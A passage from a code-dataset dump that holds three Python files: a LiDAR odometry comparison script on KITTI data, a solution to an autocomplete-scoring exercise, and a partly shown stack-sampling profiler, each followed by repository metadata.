sklearn.neighbors import KDTree\r\nfrom uq.gmm import gmmfuncs as uqgmmfnc\r\nfrom utils.plotting import geometryshapes as utpltgmshp\r\nimport time\r\nfrom scipy.optimize import minimize, rosen, rosen_der,least_squares\r\nfrom scipy import interpolate\r\nimport networkx as nx\r\nimport pdb\r\nimport pandas as pd\r\nfrom fastdist import fastdist\r\nimport copy\r\nfrom lidarprocessing import point2Dprocessing as pt2dproc\r\nfrom lidarprocessing import point3Dprocessing as pt3dproc\r\nfrom lidarprocessing import point2Dplotting as pt2dplot\r\nimport lidarprocessing.numba_codes.point2Dprocessing_numba as nbpt2Dproc\r\nfrom sklearn.neighbors import KDTree\r\nimport os\r\nimport pandas as pd\r\ntime_increment = 1.736111516947858e-05\r\nangle_increment = 0.004363323096185923\r\nscan_time = 0.02500000037252903\r\nrange_min, range_max = 0.023000000044703484, 60.0\r\nangle_min,angle_max = -2.3518311977386475,2.3518311977386475\r\nfrom numba import vectorize, float64,guvectorize,int64,double,int32,int64,float32,uintc,boolean\r\nfrom numba import njit, prange,jit\r\nimport scipy.linalg as sclalg\r\nimport scipy.optimize as scopt\r\nfrom pykitticustom import odometry\r\n\r\n# dtype = np.float32\r\nfrom lidarprocessing import icp\r\nimport open3d as o3d\r\n\r\nimport importlib\r\nimport json\r\n\r\nfrom pyslam import slam\r\nimportlib.reload(slam)\r\n#%%\r\n\r\nbasedir ='/media/na0043/misc/DATA/KITTI/odometry/dataset'\r\n# Specify the dataset to load\r\n# sequence = '02'\r\n# sequence = '05'\r\n# sequence = '06'\r\n# sequence = '08'\r\nloop_closed_seq = ['02','05','06','08']\r\nsequence = '05'\r\n\r\ndataset = odometry.odometry(basedir, sequence, frames=None) # frames=range(0, 20, 5)\r\nXtpath=np.zeros((len(dataset),4))\r\nf3 = plt.figure() \r\nax = f3.add_subplot(111)\r\nfor i in range(len(dataset)):\r\n Xtpath[i,:] = dataset.poses[i].dot(np.array([0,0,0,1]))\r\nax.plot(Xtpath[:,0],Xtpath[:,2],'k')\r\nplt.show()\r\n\r\npose = dataset.poses[1]\r\nvelo = dataset.get_velo(2)\r\n\r\n\r\n#%%\r\n\r\nimport faiss\r\nimport numpy as np\r\n\r\n\r\nclass FaissKMeans:\r\n def __init__(self, n_clusters=8, n_init=10, max_iter=300):\r\n self.n_clusters = n_clusters\r\n self.n_init = n_init\r\n self.max_iter = max_iter\r\n self.kmeans = None\r\n self.cluster_centers_ = None\r\n self.inertia_ = None\r\n\r\n def fit(self, X, y):\r\n self.kmeans = faiss.Kmeans(d=X.shape[1],\r\n k=self.n_clusters,\r\n niter=self.max_iter,\r\n nredo=self.n_init)\r\n self.kmeans.train(X.astype(np.float32))\r\n self.cluster_centers_ = self.kmeans.centroids\r\n self.inertia_ = self.kmeans.obj[-1]\r\n\r\n def predict(self, X):\r\n return self.kmeans.index.search(X.astype(np.float32), 1)[1]\r\n \r\n#%%\r\nparams={}\r\n\r\nparams['REL_POS_THRESH']=0.5# meters after which a keyframe is made\r\nparams['REL_ANGLE_THRESH']=30*np.pi/180\r\nparams['ERR_THRES']=15\r\nparams['n_components']=200\r\nparams['reg_covar']=0.2\r\n\r\n#%%\r\n\r\ndef WassersteinDist(m1,P1,m2,P2):\r\n s1 = sclalg.sqrtm(P1)\r\n g = np.matmul(np.matmul(s1,P2),s1) \r\n d = np.sqrt( nplinalg.norm(m1-m2)+np.trace( P1+P2-2*sclalg.sqrtm( g ) ) )\r\n \r\n return d\r\n\r\n\r\n@njit(parallel=True)\r\ndef distGmm(MU1,P1,W1,MU2,P2,W2):\r\n n1 = MU1.shape[0]\r\n n2 = MU2.shape[0]\r\n invPP1=np.zeros_like(P1)\r\n for i in range(n1):\r\n invPP1[i] = nplinalg.inv(P1[i])\r\n \r\n invPP2=np.zeros_like(P2)\r\n for i in range(n2):\r\n invPP2[i] = nplinalg.inv(P2[i])\r\n \r\n \r\n D=np.zeros((n1,n2))\r\n for i in prange(n1):\r\n for j in range(n2):\r\n D[i,j] = pt3dproc.BCdist_gassian(MU1[i],P1[i],MU2[j],P2[j])\r\n \r\n f=0\r\n for i in prange(n1): \r\n d=np.sort(D[i])\r\n f+=np.mean(d[d<100]) \r\n # for j in range(n2):\r\n # if D[i,j]>d:\r\n # D[i,j]=0\r\n \r\n # D=0\r\n # for i in prange(n1):\r\n # for j in prange(n2):\r\n # D+= W1[i]*W[j]*(1-BCoeff_gassian(MU1[i],invPP1[i],P1[i],MU2[j],invPP2[j],P2[j]))\r\n # D+= W1[i]*W[j]*(1-BCoeff_gassian(MU1[i],invPP1[i],P1[i],MU2[j],invPP2[j],P2[j]))\r\n \r\n # O=np.ones(n1)\r\n # I=np.identity(n1)\r\n # A=np.zeros((n1+n2,n1*n2))\r\n # for i in range(n2):\r\n # A[i,i*n1:(i*n1+n1)]=O\r\n # A[n2:,i*n1:(i+1)*n1]=I\r\n \r\n # B=np.hstack([W2,W1])\r\n \r\n # res = scopt.linprog(D.reshape(-1), A_ub=None, b_ub=None, A_eq=A, b_eq=B,bounds=(0,1))\r\n \r\n return f\r\n\r\n# @njit([numba.types.Tuple((float32,float32[:]))(float32[:], float32[:,:], float32[:,:], float32[:,:,:],float32[:]),\r\n# numba.types.Tuple((float32,float32[:]))(float64[:], float32[:,:], float32[:,:], float32[:,:,:],float32[:])],\r\n# nopython=True, fastmath=True,nogil=True,parallel=True,cache=False) \r\ndef getcostgradient3Dypr_gmms(x,MU1,P1,W1,MU2,P2,W2):\r\n x=x.astype(dtype)\r\n ncomp=MU1.shape[0]\r\n t=np.zeros(3,dtype=dtype)\r\n t[0]=x[0]\r\n t[1]=x[1]\r\n t[2]=x[2]\r\n phi=x[3]\r\n xi=x[4]\r\n zi=x[5]\r\n\r\n\r\n \r\n Rzphi,dRzdphi=pt3dproc.Rz(phi)\r\n Ryxi,dRydxi=pt3dproc.Ry(xi)\r\n Rxzi,dRxdzi=pt3dproc.Rx(zi)\r\n\r\n R = Rzphi.dot(Ryxi)\r\n R=R.dot(Rxzi)\r\n \r\n \r\n \r\n\r\n G=dRzdphi.dot(Ryxi)\r\n dRdphi=G.dot(Rxzi)\r\n \r\n G=Rzphi.dot(dRydxi)\r\n dRdxi=G.dot(Rxzi)\r\n \r\n G=Rzphi.dot(Ryxi)\r\n dRdzi=G.dot(dRxdzi)\r\n \r\n\r\n MU2trans=R.dot(MU1.T).T+t\r\n\r\n # invPP1=np.zeros_like(P1)\r\n # invPP2=np.zeros_like(P2)\r\n PP2trans=np.zeros_like(P2)\r\n MU2trans=np.zeros_like(MU2)\r\n # denom1 = np.zeros(ncomp,dtype=dtype)\r\n # denom2 = np.zeros(ncomp,dtype=dtype)\r\n for i in range(ncomp):\r\n # invPP1[i] = nplinalg.inv(P1[i])\r\n # denom1[i] = W1[i]*1/np.sqrt(nplinalg.det(2*np.pi*P1[i])) \r\n \r\n # invPP2[i] = nplinalg.inv(P2[i])\r\n # denom2[i] = W2[i]*1/np.sqrt(nplinalg.det(2*np.pi*P2[i])) \r\n PP2trans[i] = np.dot(R.dot(P2[i]),R.T)\r\n\r\n\r\n \r\n return distGmm(MU1,P1,W1,MU2trans,PP2trans,W2)\r\n\r\n#%%\r\nfrom sklearn import mixture\r\nplt.close(\"all\")\r\nfolder='lidarprocessing/'\r\n\r\ni=1\r\nf1=\"%06d.bin\"%i\r\nX1 = np.fromfile(folder+'/'+f1, dtype=np.float32)\r\nX1=X1.reshape((-1, 4))\r\nX1=X1.astype(dtype)\r\n\r\npcd = o3d.geometry.PointCloud()\r\npcd.points = o3d.utility.Vector3dVector(X1[:,:3])\r\nvoxel_down_pcd = pcd.voxel_down_sample(voxel_size=0.1)\r\nX11=np.asarray(voxel_down_pcd.points)\r\nX11=np.ascontiguousarray(X11,dtype=dtype)\r\n\r\nX22=X11+1\r\n\r\n\r\nvoxel_down_pcd.estimate_normals(\r\n search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.2, max_nn=30))\r\nXn=np.array(voxel_down_pcd.normals)\r\n\r\nX11n=np.hstack([X11,np.array(voxel_down_pcd.normals)])\r\n\r\nX11=X11[:10000,:]\r\nX11n=X11n[:10000,:]\r\nX22=X22[:10000,:]\r\n\r\nNcmp=100\r\n# from scipy.cluster.vq import kmeans2\r\n# centroid, label = kmeans2(X11.T, Ncmp, minit='points')\r\n\r\nfkm=FaissKMeans(n_clusters=Ncmp, n_init=10, max_iter=50)\r\nfkm.fit(np.ascontiguousarray(X11n,dtype=dtype),None)\r\nXkmidx=fkm.predict(X11n)\r\nXkmidx=Xkmidx.reshape(-1)\r\n\r\nMU=np.zeros((Ncmp,3),dtype=dtype)\r\ninvP=np.zeros((Ncmp,3,3),dtype=dtype)\r\nP=np.zeros((Ncmp,3,3),dtype=dtype)\r\nW=np.ones(Ncmp)/Ncmp\r\nfor i in range(Ncmp):\r\n X=X11[Xkmidx==i,:]\r\n MU[i]=np.mean(X,axis=0)\r\n P[i]=np.cov(X.T)\r\n invP[i]=nplinalg.inv(P[i])\r\n\r\nW=W/sum(W)\r\n\r\n# MU,P,W=pt3dproc.gmmEM(X11,MU.copy(),P.copy(),W.copy(),250,0.1)\r\n\r\nfig = plt.figure(\"x-y kmeans\")\r\nax = fig.add_subplot(111)\r\nax.plot(X11[:,0],X11[:,1],'b.')\r\nfor i in range(len(W)):\r\n Xgmm=utpltgmshp.getCovEllipsePoints2D(MU[i,0:2],P[i,0:2,0:2],nsig=1,N=100)\r\n ax.plot(Xgmm[:,0],Xgmm[:,1],'r')\r\n\r\n \r\nclf = mixture.GaussianMixture(n_components=Ncmp,\r\n covariance_type='full',reg_covar=0.1,weights_init=W,means_init=MU,precisions_init=invP,\r\n warm_start=True,max_iter=10)\r\n \r\nclf.fit(X11)\r\n\r\nMU=np.ascontiguousarray(clf.means_,dtype=dtype)\r\nP=np.ascontiguousarray(clf.covariances_,dtype=dtype)\r\nW=np.ascontiguousarray(clf.weights_,dtype=dtype)\r\n\r\nfig = plt.figure(\"x-y after EM\")\r\nax = fig.add_subplot(111)\r\nax.plot(X11[:,0],X11[:,1],'b.')\r\nfor i in range(len(W)):\r\n Xgmm=utpltgmshp.getCovEllipsePoints2D(MU[i,0:2],P[i,0:2,0:2],nsig=1,N=100)\r\n ax.plot(Xgmm[:,0],Xgmm[:,1],'r')\r\n \r\n \r\n\r\nclf = mixture.GaussianMixture(n_components=Ncmp,\r\n covariance_type='full',reg_covar=0.1,\r\n warm_start=False)\r\n \r\nclf.fit(X22)\r\n\r\nMU2=np.ascontiguousarray(clf.means_,dtype=dtype)\r\nP2=np.ascontiguousarray(clf.covariances_,dtype=dtype)\r\nW2=np.ascontiguousarray(clf.weights_,dtype=dtype)\r\n\r\n\r\n\r\n\r\nplotit=False\r\nif plotit:\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111, projection='3d')\r\n ax.plot(X11[:,0],X11[:,1],X11[:,2],'b.')\r\n \r\n fig = plt.figure(\"x-y\")\r\n ax = fig.add_subplot(111)\r\n ax.plot(X11[:,0],X11[:,1],'b.')\r\n for i in range(len(W)):\r\n Xgmm=utpltgmshp.getCovEllipsePoints2D(MU[i,0:2],P[i,0:2,0:2],nsig=1,N=100)\r\n ax.plot(Xgmm[:,0],Xgmm[:,1],'r')\r\n \r\n fig = plt.figure(\"y-z\")\r\n ax = fig.add_subplot(111)\r\n ax.plot(X11[:,1],X11[:,2],'b.')\r\n for i in range(len(W)):\r\n Xgmm=utpltgmshp.getCovEllipsePoints2D(MU[i,1:3],P[i,1:3,1:3],nsig=1,N=100)\r\n ax.plot(Xgmm[:,0],Xgmm[:,1],'r')\r\n \r\n fig = plt.figure(\"x-z\")\r\n ax = fig.add_subplot(111)\r\n ax.plot(X11[:,0],X11[:,2],'b.')\r\n for i in range(len(W)):\r\n Xgmm=utpltgmshp.getCovEllipsePoints2D(MU[i,[0,2]],P[i,0:3:2,0:3:2],nsig=1,N=100)\r\n ax.plot(Xgmm[:,0],Xgmm[:,1],'r')\r\n \r\n\r\nx=np.array([-2,-2,-2,np.pi/8,0,0],dtype=dtype)\r\nst=time.time()\r\nf,g=pt3dproc.getcostgradient3Dypr(x,X22.T,MU,P,W)\r\nprint(\"f=\",f)\r\net=time.time()\r\nprint(\"grad :\",et-st)\r\n\r\n# def gg(x,Xt,MU,P,W):\r\n# x=np.hstack([x,np.zeros(3)])\r\n# x=x.astype(dtype)\r\n# f,g=pt3dproc.getcostgradient3Dypr(x,Xt,MU,P,W)\r\n# return f\r\n\r\n# res = minimize(gg, x[0:3],args=(X22,MU,P,W),jac= '3-point',tol=1e-3,method='BFGS',options={'disp':True,'gtol':1e-3}) # 'Nelder-Mead'\r\n# print(res)\r\n# SLSQP\r\nst=time.time()\r\nres1 = minimize(pt3dproc.getcostgradient3Dypr, x,args=(X22.T,MU,P,W),jac= True,tol=1e-3,method='BFGS',options={'disp':True,'maxiter':10}) # 'Nelder-Mead'\r\net=time.time()\r\nprint(\"time :\",et-st)\r\nprint(res1.x) \r\n\r\nst=time.time()\r\nres2 = minimize(pt3dproc.getcostgradient3Dypr_v2, x,args=(X22,MU,P,W),jac= True,tol=1e-1,method='BFGS',options={'disp':True,'maxiter':15}) # 'Nelder-Mead'\r\net=time.time()\r\nprint(\"time :\",et-st) \r\nprint(res2.x) \r\n\r\nst=time.time()\r\nres3 = minimize(getcostgradient3Dypr_gmms, x,args=(MU,P,W,MU2,P2,W2),jac= None,tol=1e-3,method='Nelder-Mead',options={'disp':True}) # 'Nelder-Mead'\r\net=time.time()\r\nprint(\"time :\",et-st) \r\n\r\n\r\n\r\n#%%\r\nplt.close(\"all\")\r\nD={\"icp\":{},\r\n \"gicp\":{},\r\n \"gicp_cost\":{},\r\n \"ndt\":{}}\r\n\r\nD[\"icp\"][\"enable\"]=1\r\nD[\"icp\"][\"setMaximumIterations\"]=500\r\nD[\"icp\"][\"setMaxCorrespondenceDistance\"]=10\r\nD[\"icp\"][\"setRANSACIterations\"]=0.0\r\nD[\"icp\"][\"setRANSACOutlierRejectionThreshold\"]=1.5\r\nD[\"icp\"][\"setTransformationEpsilon\"]=1e-9\r\nD[\"icp\"][\"setEuclideanFitnessEpsilon\"]=0.01\r\n\r\n\r\nD[\"gicp_cost\"][\"enable\"]=0\r\n\r\n\r\nD[\"gicp\"][\"enable\"]=1\r\nD[\"gicp\"][\"setMaxCorrespondenceDistance\"]=10\r\nD[\"gicp\"][\"setMaximumIterations\"]=30.0\r\nD[\"gicp\"][\"setMaximumOptimizerIterations\"]=30.0\r\nD[\"gicp\"][\"setRANSACIterations\"]=0.0\r\nD[\"gicp\"][\"setRANSACOutlierRejectionThreshold\"]=1.5\r\nD[\"gicp\"][\"setTransformationEpsilon\"]=1e-9\r\nD[\"gicp\"][\"setUseReciprocalCorrespondences\"]=1\r\n\r\nD[\"ndt\"][\"enable\"]=0\r\nD[\"ndt\"][\"setTransformationEpsilon\"]=1e-9\r\nD[\"ndt\"][\"setStepSize\"]=2.0\r\nD[\"ndt\"][\"setResolution\"]=1.0\r\nD[\"ndt\"][\"setMaximumIterations\"]=25.0\r\nD[\"ndt\"][\"initialguess_axisangleA\"]=0.0\r\nD[\"ndt\"][\"initialguess_axisangleX\"]=0.0\r\nD[\"ndt\"][\"initialguess_axisangleY\"]=0.0\r\nD[\"ndt\"][\"initialguess_axisangleZ\"]=1.0\r\nD[\"ndt\"][\"initialguess_transX\"]=0.5\r\nD[\"ndt\"][\"initialguess_transY\"]=0.01\r\nD[\"ndt\"][\"initialguess_transZ\"]=0.01\r\n\r\n\r\n# res2 = minimize(pt3dproc.getcostgradient3Dypr_v2, x,args=(X22,MU,P,W),jac= True,tol=1e-1,method='BFGS',options={'disp':True,'maxiter':15}) # 'Nelder-Mead'\r\n# t=res2.x[:3]\r\n# phi=res2.x[3]\r\n# xi=res2.x[4]\r\n# zi=res2.x[5]\r\n# Rzphi,dRzdphi=pt3dproc.Rz(phi)\r\n# Ryxi,dRydxi=pt3dproc.Ry(xi)\r\n# Rxzi,dRxdzi=pt3dproc.Rx(zi)\r\n\r\n# R = Rzphi.dot(Ryxi)\r\n# R=R.dot(Rxzi)\r\n# H=np.hstack([R,t.reshape(-1,1)])\r\n# H=np.vstack([H,[0,0,0,1]])\r\n# H=H.astype(np.float32)\r\n\r\nXlims=[-50,50]\r\nYlims=[-50,50]\r\nZlims=[-3,3]\r\ndef limitpcd(X):\r\n X=X[(X[:,0]>=Xlims[0]) & (X[:,0]<=Xlims[1])]\r\n X=X[(X[:,1]>=Ylims[0]) & (X[:,1]<=Ylims[1])]\r\n X=X[(X[:,2]>=Zlims[0]) & (X[:,2]<=Zlims[1])]\r\n return X\r\n\r\n# fig = plt.figure()\r\n# ax = fig.add_subplot(111, projection='3d')\r\n# ax.plot(X11[:,0],X11[:,1],X11[:,2],'b.')\r\n\r\n# X11=limitpcd(X11) \r\n# fig = plt.figure()\r\n# ax = fig.add_subplot(111, projection='3d')\r\n# ax.plot(X11[:,0],X11[:,1],X11[:,2],'b.')\r\n\r\n\r\nHicp=[np.identity(4)]\r\nHgicp=[np.identity(4)]\r\nHndt=[np.identity(4)]\r\n\r\nXicp=np.zeros((len(dataset),3))\r\nXgicp=np.zeros((len(dataset),3))\r\nXndt=np.zeros((len(dataset),3))\r\n\r\nHgmmtrans=[np.identity(4)]\r\n\r\nfig = plt.figure(\"gg-plot\")\r\nax = fig.add_subplot(111,projection='3d')\r\n\r\nfor pp in range(1,len(dataset)):\r\n print(pp)\r\n X1 = dataset.get_velo(pp-1)\r\n X2 = dataset.get_velo(pp)\r\n \r\n X1=X1[:,:3]\r\n X2=X2[:,:3]\r\n # phi=np.pi/8*np.random.randn()\r\n # xi=np.pi/8*np.random.randn()\r\n # zi=np.pi/8*np.random.randn()\r\n # Rzphi,dRzdphi=pt3dproc.Rz(phi)\r\n # Ryxi,dRydxi=pt3dproc.Ry(xi)\r\n # Rxzi,dRxdzi=pt3dproc.Rx(zi)\r\n\r\n # R = Rzphi.dot(Ryxi)\r\n # R=R.dot(Rxzi)\r\n # X2=X2+2*np.random.randn(X2.shape[0],X2.shape[1])\r\n\r\n pcd1 = o3d.geometry.PointCloud()\r\n pcd1.points = o3d.utility.Vector3dVector(X1)\r\n voxel_down_pcd1 = pcd1.voxel_down_sample(voxel_size=0.1)\r\n \r\n X11=np.asarray(voxel_down_pcd1.points)\r\n # X11=np.ascontiguousarray(X11,dtype=dtype)\r\n \r\n pcd2 = o3d.geometry.PointCloud()\r\n pcd2.points = o3d.utility.Vector3dVector(X2)\r\n voxel_down_pcd2 = pcd2.voxel_down_sample(voxel_size=0.1)\r\n \r\n X22=np.asarray(voxel_down_pcd2.points)\r\n # X22=np.ascontiguousarray(X22,dtype=dtype)\r\n \r\n \r\n \r\n\r\n \r\n \r\n ##\r\n voxel_down_pcd1.estimate_normals(\r\n search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.5, max_nn=30))\r\n Xn=np.array(voxel_down_pcd1.normals)\r\n Xnormals = np.array(voxel_down_pcd1.normals)\r\n X11n=np.hstack([X11,Xnormals])\r\n\r\n X11=limitpcd(X11) \r\n X22=limitpcd(X22) \r\n X11n=limitpcd(X11n) \r\n \r\n Ncmp=100\r\n # st=time.time()\r\n # fkm=FaissKMeans(n_clusters=Ncmp, n_init=5, max_iter=50)\r\n # fkm.fit(np.ascontiguousarray(X11n,dtype=dtype),None)\r\n # Xkmidx=fkm.predict(X11n)\r\n # Xkmidx=Xkmidx.reshape(-1)\r\n\r\n # MU=np.zeros((Ncmp,3),dtype=dtype)\r\n # invP=np.zeros((Ncmp,3,3),dtype=dtype)\r\n # P=np.zeros((Ncmp,3,3),dtype=dtype)\r\n # W=np.ones(Ncmp)/Ncmp\r\n # for i in range(Ncmp):\r\n # X=X11[Xkmidx==i,:]\r\n # MU[i]=np.mean(X,axis=0)\r\n # P[i]=np.cov(X.T)\r\n # invP[i]=nplinalg.inv(P[i])\r\n\r\n # W=W/sum(W)\r\n \r\n # clf = mixture.GaussianMixture(n_components=Ncmp,\r\n # covariance_type='full',reg_covar=0.01,weights_init=W,means_init=MU,precisions_init=invP,\r\n # warm_start=True)\r\n # clf = mixture.GaussianMixture(n_components=Ncmp,\r\n # covariance_type='full',reg_covar=0.01, warm_start=True)\r\n \r\n # clf.fit(X11)\r\n\r\n # MU=np.ascontiguousarray(clf.means_,dtype=dtype)\r\n # P=np.ascontiguousarray(clf.covariances_,dtype=dtype)\r\n # W=np.ascontiguousarray(clf.weights_,dtype=dtype)\r\n # et=time.time()\r\n # print(\"time taken by EM = \", et-st)\r\n # st=time.time()\r\n \r\n # x=np.array([0.6,0.05,0.01,np.pi/16,0,0],dtype=dtype)\r\n # res2 = minimize(pt3dproc.getcostgradient3Dypr_v2, x,args=(X22,MU,P,W),jac= True,tol=1e-2,method='BFGS',options={'disp':False,'maxiter':100}) # 'Nelder-Mead'\r\n # t=res2.x[:3]\r\n # phi=res2.x[3]\r\n # xi=res2.x[4]\r\n # zi=res2.x[5]\r\n # Rzphi,dRzdphi=pt3dproc.Rz(phi)\r\n # Ryxi,dRydxi=pt3dproc.Ry(xi)\r\n # Rxzi,dRxdzi=pt3dproc.Rx(zi)\r\n\r\n # R = Rzphi.dot(Ryxi)\r\n # R=R.dot(Rxzi)\r\n # H=np.hstack([R,t.reshape(-1,1)])\r\n # H=np.vstack([H,[0,0,0,1]])\r\n # H=H.astype(np.float32)\r\n # Hgmmtrans.append(H)\r\n # et=time.time()\r\n # print(\"time taken by BFGS = \", et-st)\r\n \r\n # X11=limitpcd(X11) \r\n # X22=limitpcd(X22) \r\n \r\n Hpcl=slam.registrations(X22,X11,json.dumps(D))\r\n Hpcl=dict(Hpcl)\r\n # HH=icp.icp(X22, X11, init_pose=None, max_iterations=100, tolerance=0.001)\r\n # Hpcl[0]=nplinalg.inv(Hpcl[0])\r\n # HtransPCL.append(Hpcl)\r\n \r\n # ICP path\r\n\r\n\r\n Xicp=np.zeros((len(dataset),3))\r\n Xgicp=np.zeros((len(dataset),3))\r\n Xndt=np.zeros((len(dataset),3))\r\n\r\n \r\n H=Hpcl[\"H_icp\"]\r\n Hicp.append(Hicp[-1].dot(H))\r\n \r\n H=Hpcl[\"H_gicp\"]\r\n Hgicp.append(Hgicp[-1].dot(H))\r\n \r\n # H=Hpcl[\"H_ndt\"]\r\n # Hndt.append(Hndt[-1].dot(H))\r\n \r\n # H=Hgmmtrans[i]\r\n # Hgmm=Hgmm.dot(H)\r\n \r\n Xicp[pp]=Hicp[-1][0:3,3]\r\n Xgicp[pp]=Hgicp[-1][0:3,3]\r\n # Xndt[pp]=Hndt[-1][0:3,3]\r\n # Xgmm[i]=Hgmm[0:3,3]\r\n \r\n n=len(Hicp) \r\n \r\n ax.cla()\r\n \r\n \r\n # ax.plot(Xtpath[:n,2],-Xtpath[:n,0],'k',label='True')\r\n ax.plot(Xgicp[:n,0],Xgicp[:n,1],Xgicp[:n,2],'r',label='gicp')\r\n # ax.plot(Xndt[:n,0],Xndt[:n,1],Xndt[:n,2],'b',label='ndt')\r\n ax.plot(Xicp[:n,0],Xicp[:n,1],Xicp[:n,2],'g',label='icp')\r\n # ax.plot(Xgmm[:n,0],Xgmm[:n,1],'b',label='gmm')\r\n ax.legend()\r\n ax.set_title(\"main-all\")\r\n plt.pause(0.1)\r\n plt.show()\r\n \r\n if pp>150:\r\n break\r\n \r\n \r\n\r\nn=len(Hicp)\r\n\r\n\r\nplt.close(\"all\") \r\nfig = plt.figure()\r\nax = fig.add_subplot(111)\r\nax.plot(Xtpath[:n,2],-Xtpath[:n,0],'k',label='True')\r\nax.set_title(\"true\")\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(111)\r\nax.plot(Xtpath[:n,2],-Xtpath[:n,0],'k',label='True')\r\nax.plot(Xicp[:n,0],Xicp[:n,1],'r',label='icp')\r\nax.legend()\r\nax.set_title(\"icp\")\r\n\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(111)\r\nax.plot(Xtpath[:n,2],-Xtpath[:n,0],'k',label='True')\r\nax.plot(Xgicp[:n,0],Xgicp[:n,1],'b',label='gicp')\r\nax.legend()\r\nax.set_title(\"gicp\")\r\n\r\n\r\n\r\n# fig = plt.figure()\r\n# ax = fig.add_subplot(111)\r\n# ax.plot(Xtpath[:n,2],-Xtpath[:n,0],'k',label='True')\r\n# ax.plot(Xndt[:n,0],Xndt[:n,1],'g',label='ndt')\r\n# ax.legend()\r\n# ax.set_title(\"ndt\")\r\n\r\n# fig = plt.figure()\r\n# ax = fig.add_subplot(111)\r\n# ax.plot(Xtpath[:n,2],-Xtpath[:n,0],'k',label='True')\r\n# ax.plot(Xgmm[:n,0],Xgmm[:n,1],'b',label='gmm')\r\n# ax.legend()\r\n# ax.set_title(\"gmm\")\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(111)\r\nax.plot(Xtpath[:n,2],-Xtpath[:n,0],'k',label='True')\r\nax.plot(Xgicp[:n,0],Xgicp[:n,1],'r',label='gicp')\r\n# ax.plot(Xgmm[:n,0],Xgmm[:n,1],'b',label='gmm')\r\nax.legend()\r\nax.set_title(\"main-all\")\r\n","repo_name":"nadurthi/ResearchCodes","sub_path":"main_kitti_compare_odometry.py","file_name":"main_kitti_compare_odometry.py","file_ext":"py","file_size_in_byte":19080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71696561720","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n#\n# Complete the 'getAutocompleteScores' function below.\n#\n# The function is expected to return an INTEGER_ARRAY.\n# The function accepts following parameters:\n# 1. STRING_ARRAY documentTitles\n# 2. STRING_ARRAY documentBodies\n# 3. STRING_ARRAY queries\n#\n\ndef getAutocompleteScores(documentTitles, documentBodies, queries):\n # Write your code here\n '''\n have to find the highest score it can autocomplete to\n step 1: figure out what it can complete to\n step 2: figure out the scores of each\n step 3: return the highest score\n '''\n # our return array \n scores = []\n\n # read all words into a dictionary with key = word, value = [n,m]\n # n = title ocurrences, m = body occurrences \n words = createWordDictionary(documentTitles, documentBodies)\n\n # now that we have ocurrences, get scores for every word we've seen\n wordScores = assignScores(words)\n\n\n # calculate scores for every query\n for query in queries:\n possibleWords = findPossibleWords(query, wordScores)\n highestScore = 0 # if no possible words, will still add 0 to scores array\n for word in possibleWords:\n tempScore = wordScores[word]\n if tempScore > highestScore:\n highestScore = tempScore\n scores.append(highestScore)\n return scores\n\ndef findPossibleWords(start, words):\n # given the start of the word, find out\n # what it can complete to\n possibleWords = []\n\n # go thru every word and see if can complete \n for word in words.keys():\n if canComplete(start, word):\n possibleWords.append(word)\n\n return possibleWords\n\n\n\ndef createWordDictionary(documentTitles, documentBodies):\n # given a word, get the total score across the input\n # returns zero if word not in the documents \n words = {}\n for title in documentTitles:\n titleWords = title.split()\n for word in titleWords:\n if word not in words:\n words[word] = [1, 0]\n else:\n words[word][0] += 1\n\n for body in documentBodies:\n bodyWords = body.split()\n for word in bodyWords:\n if word not in words:\n words[word] = [0, 1]\n else:\n words[word][1] += 1\n \n return words\n\ndef assignScores(words):\n wordsScores = {}\n for key, value in words.items():\n score = int(value[0]*10 + value[1]*1)\n wordsScores[key] = score\n\n return wordsScores\n\ndef canComplete(target, word):\n if target > word:\n return False\n\n for i in range(len(target)):\n if target[i] != word[i]:\n return False\n \n # if we've made it this far, every char in target \n # was in word so it can complete \n return True\n \n\n\n\n \n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n documentTitles_count = int(input().strip())\n\n documentTitles = []\n\n for _ in range(documentTitles_count):\n documentTitles_item = input()\n documentTitles.append(documentTitles_item)\n\n documentBodies_count = int(input().strip())\n\n documentBodies = []\n\n for _ in range(documentBodies_count):\n documentBodies_item = input()\n documentBodies.append(documentBodies_item)\n\n queries_count = int(input().strip())\n\n queries = []\n\n for _ in range(queries_count):\n queries_item = input()\n queries.append(queries_item)\n\n result = getAutocompleteScores(documentTitles, documentBodies, queries)\n\n fptr.write('\\n'.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"tofuadmiral/leetcodermans","sub_path":"coin_change.py","file_name":"coin_change.py","file_ext":"py","file_size_in_byte":3648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38540443387","text":"from __future__ import print_function\nimport threading\nfrom time import sleep\nimport traceback\nfrom sys import _current_frames\n\n\nclass Sampler:\n def __init__(self, tid) -> None:\n self.tid = tid\n self.t = threading.Thread(target=self.sample, args=())\n self.active = True\n self.final_tree = [] # [function_name, seg, pos, parents] \n \n \n def start(self):\n self.active = True\n self.t.start()\n\n \n def stop(self):\n self.active = False\n \n def checkTrace(self):\n for thread_id, frames in _current_frames().items():\n if thread_id == self.tid:\n frames = traceback.walk_stack(frames)\n stack = []\n for frame, _ in frames: \n code = frame.f_code.co_name\n stack.append(code)\n stack.reverse()\n #print(stack) # Esta linea imprime el stack despues de invertirlo la pueden comentar o descomentar si quieren\n \n # agregar los nuevos nodos\n for pos in range(len(stack)):\n self.usado = False\n for fun in self.final_tree: \n if stack[pos] == fun[0] and pos == fun[2] and fun[3] == stack[0:pos] :\n self.usado = True\n fun[1] += 1\n break\n if self.usado == False:\n self.final_tree.append([stack[pos], 1, pos, stack[0:pos]])\n\n # Desactivar funciones ACA hay que modificar (ver si hacer un mas 1 al pos_tree para dar espacio)\n \n \n def sample(self):\n while self.active:\n self.checkTrace()\n sleep(1)\n\n def printReport(self):\n print(f\"total ({self.final_tree[0][1]} seconds)\")\n for i in self.final_tree:\n print(\" \"*i[2], i[0], f\"({i[1]} 